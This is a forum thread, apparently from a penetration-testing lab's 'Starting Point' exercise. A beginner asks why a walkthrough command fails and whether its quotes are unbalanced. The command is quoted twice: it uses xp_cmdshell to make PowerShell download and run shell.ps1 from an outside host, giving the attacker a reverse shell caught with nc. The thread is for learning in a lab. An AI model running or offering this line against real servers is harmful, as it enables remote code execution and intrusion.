Starting Point Foothold

In the tutorial, I am instructed to do use command:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");" 

Why are there 5 double quotes? Doesn’t match in pairs. It didn’t affect the problem I am facing (described below).

I tried:

xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");" 

However, I have the following error:

New-Object : The 'New-Object' command was found in the module 'Microsoft.PowerShell.Utility', but the module could not
be loaded. For more information, run 'Import-Module Microsoft.PowerShell.Utility'.

I am new, did I do something wrong?

I found what I did was wrong.

I am new, I am still not sure what the hell that command does or why I got that error whether i remove one double quote or not. I doesn’t get it on my second attempt.

The walkthrough is not clear to me as I finally realizes now that a shell is received on my console running the nc command.

Did you run this from the SQL window or did you open a new terminal?